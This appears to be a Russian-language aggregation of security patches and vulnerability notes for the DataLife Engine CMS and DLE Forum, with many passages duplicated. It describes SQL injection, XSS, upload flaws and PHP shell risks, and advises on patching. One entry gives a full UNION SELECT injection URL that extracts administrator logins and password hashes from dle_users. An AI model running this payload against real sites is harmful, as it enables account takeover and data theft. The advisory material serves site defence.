Исправление опечатки в файле .htaccess
Патчи безопасности для версий 9.7 и ниже
Проблема: Проведение SQL инъекций, в случае игнорирования администратором сайта уведомления в админпанели скрипта, о недопустимости включения на сервере небезопасной настройки register_globals, а также возможность обхода кода безопасности CAPTCHA при регистрации.
Ошибка в версии: 9.7 и все более ранние версии
Степень опасности: Высокая при использовании включенной настройки register_globals, отсутствует при выполнении рекомендаций по отключению данной настройки в настройках сервера. Установка патча тем не менее обязательна для всех, т.к. патч устраняет возможный обход каптчи и другие проблемы.
Ошибка в версии: 9.7 и все более ранние версии
Степень опасности: Высокая при использовании включенной настройки register_globals, отсутствует при выполнении рекомендаций по отключению данной настройки в настройках сервера. Установка патча тем не менее обязательна для всех, т.к. патч устраняет возможный обход каптчи и другие проблемы.
Недостаточная фильтрация в модуле Переходы от 10.09.2011
Ошибка в версии: все версии
Степень опасности: Высокая
Патч WYSIWYG редактора для DataLife Engine v.9.3
Уважаемые пользователи,
Новая версия DataLife Engine v.9.3 была предоставлена с WYSIWYG редактором новейшей версии TinyMCE 3.4.2, к сожалению данную версию редактора нельзя назвать стабильной, и в нем были обнаружены следующие проблемы:
1. Невозможность использования горячих клавиш Ctrl-V для вставки текста в браузере Опера 11.xx
2. Некорректная массовая вставка загруженных картинок на сервер.
Новая версия DataLife Engine v.9.3 была предоставлена с WYSIWYG редактором новейшей версии TinyMCE 3.4.2, к сожалению данную версию редактора нельзя назвать стабильной, и в нем были обнаружены следующие проблемы:
1. Невозможность использования горячих клавиш Ctrl-V для вставки текста в браузере Опера 11.xx
2. Некорректная массовая вставка загруженных картинок на сервер.
Исправление бага с русскими никами в Online 5.0
Исправление бага с русскими никами при переходе к профилю
Защита папок скрипта от запуска сторонних скриптов
Дорогие друзья,
в этой небольшой статье мы хотим рассказать вам о том как, как вам можно повысить безопасность вашего сайта. Как известно наибольшую угрозу для сайта представляют собой залитые злоумышленником на сервер PHP шеллы. Что это такое? Это PHP скрипты которые могут выполняться на вашем сервере, соответственно производить какие-либо изменения в файлах доступных для записи или могут, например читать содержимое конфигурационных данных и соответственно получать прямой доступ к базе данных. Каким образом могут попадать данные шеллы на ваш сервер? При обнаружении какой либо уязвимости в скрипте, или сторонних модулях, или вообще при наличии других уязвимых сторонних скриптов на сервере, или серверного ПО. Главная особенность заключается в том, что шеллы можно залить не в любые папки на сервере, а лишь в папки доступные для записи на сервере, и в DataLife Engine такими папками являются папки /uploads/ и /templates/, а также все вложенные в них папки. Данные папки должны иметь права на запись, т.к. вы в них заливаете посредством скрипта легальный контент, файлы, картинки, редактируете в админпанели шаблоны и прочее. И как правило в эти папки производится загрузка шеллов при обнаружении злоумышленником какой либо бреши на сервере в любом скрипте, даже не имеющем отношения к DataLife Engine. Можно ли защитить эти папки, в случае попадания в них зловредного PHP файла, ведь нельзя запретить доступ к этим папкам? Можно, и достаточно не сложно.
в этой небольшой статье мы хотим рассказать вам о том как, как вам можно повысить безопасность вашего сайта. Как известно наибольшую угрозу для сайта представляют собой залитые злоумышленником на сервер PHP шеллы. Что это такое? Это PHP скрипты которые могут выполняться на вашем сервере, соответственно производить какие-либо изменения в файлах доступных для записи или могут, например читать содержимое конфигурационных данных и соответственно получать прямой доступ к базе данных. Каким образом могут попадать данные шеллы на ваш сервер? При обнаружении какой либо уязвимости в скрипте, или сторонних модулях, или вообще при наличии других уязвимых сторонних скриптов на сервере, или серверного ПО. Главная особенность заключается в том, что шеллы можно залить не в любые папки на сервере, а лишь в папки доступные для записи на сервере, и в DataLife Engine такими папками являются папки /uploads/ и /templates/, а также все вложенные в них папки. Данные папки должны иметь права на запись, т.к. вы в них заливаете посредством скрипта легальный контент, файлы, картинки, редактируете в админпанели шаблоны и прочее. И как правило в эти папки производится загрузка шеллов при обнаружении злоумышленником какой либо бреши на сервере в любом скрипте, даже не имеющем отношения к DataLife Engine. Можно ли защитить эти папки, в случае попадания в них зловредного PHP файла, ведь нельзя запретить доступ к этим папкам? Можно, и достаточно не сложно.
Недостаточная фильтрация входящих данных
Проблема: Недостаточная фильтрация входящих данных.
Ошибка в версии: Все версии
Степень опасности: Высокая
Ошибка в версии: Все версии
Степень опасности: Высокая
Исправления в DLE Forum 2.5 для корректной работы со смайлами в DLE 9.0
Автор: Skater_1992
Совместимость: DLE Forum 2.x (тестилось на 2.5)
Делаем чтобы смайлы показывались на DLE 9.0
Очередная инъекция в DLE Forum
Описание: sql-инъекция
Зависимость: register_globals = on
Файл: engine/forum/sources/showtopic.php
Кусок кода:
Как осуществить: http://site.com/?do=forum&act=topic&tid=1+[SQL]
Зависимость: register_globals = on
Файл: engine/forum/sources/showtopic.php
Кусок кода:
if (intval($tid))
$row_topic = $db->super_query("SELECT * FROM " . PREFIX . "_forum_topics WHERE tid = $tid");
$row_topic = $db->super_query("SELECT * FROM " . PREFIX . "_forum_topics WHERE tid = $tid");
Как осуществить: http://site.com/?do=forum&act=topic&tid=1+[SQL]
SQL – инъекция в DLE-Forum 2.4
В DLE Forum 2.4 есть уязвимость, которая позволяет выполнять запросы в бд, и узнавать любую инфу, например о логинах и о паролях.
У кого стоит данная версия форума, рекомендуется проверить на уязвимость:
У кого стоит данная версия форума, рекомендуется проверить на уязвимость:
ваш_сайт.ру/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1-- ,
Баг - получаем список доп. полей
Данный баг позволяет просто скачать список доп. полей новостей и юзеров
DLE уязвимость работает на версиях: ВСЕ DLE
Уровень риска: Низкая
Нашёл очередной баг: Lion__
DLE уязвимость работает на версиях: ВСЕ DLE
Уровень риска: Низкая
Нашёл очередной баг: Lion__
Баг - прямой вызов файлов и мусор в папках
Данный баг позволяет производить прямой запуск файлов и мусорить в папках
DLE уязвимость работает на версиях: ВСЕ DLE
Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)
Нашёл очередной баг: Lion__
DLE уязвимость работает на версиях: ВСЕ DLE
Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)
Нашёл очередной баг: Lion__
Недостаточная фильтрация входящих данных
Проблема: Пользователю которому разрешена загрузка файлов на сервер (не картинок), может выйти за пределы разрешенной папки загрузки, а если он имеет администраторский аккаунт на сайте, то и повредить данные скрипта.
Ошибка в версии: Все версии
Степень опасности: Средняя (Высокая при наличии администраторского аккаунта на сайте)
Ошибка в версии: Все версии
Степень опасности: Средняя (Высокая при наличии администраторского аккаунта на сайте)
Как исправить в полной новости...
Проведение атаки межсайтового скриптинга (XSS)
Проблема: При определенных условиях на сайт можно провести атаку XSS. Данными условиями является посещение авторизованным администратором, сайта злоумышленника, при этом использование администратором устаревшего браузера, что может привести к перехвату куков браузера.
Ошибка в версии: 7.x - 8.5
Степень опасности: Низкая
Для исправления скачайте и скопируйте на свой сервер патч:
Данный патч применим ко всем версиям: 7.x - 8.5
Ошибка в версии: 7.x - 8.5
Степень опасности: Низкая
Для исправления скачайте и скопируйте на свой сервер патч:
Данный патч применим ко всем версиям: 7.x - 8.5
Исправления в DLE Forum 2.5 для корректной работы в DLE 8.5
Исправления в DLE Forum 2.5 для корректной работы в DLE 8.5 (полная инструкция)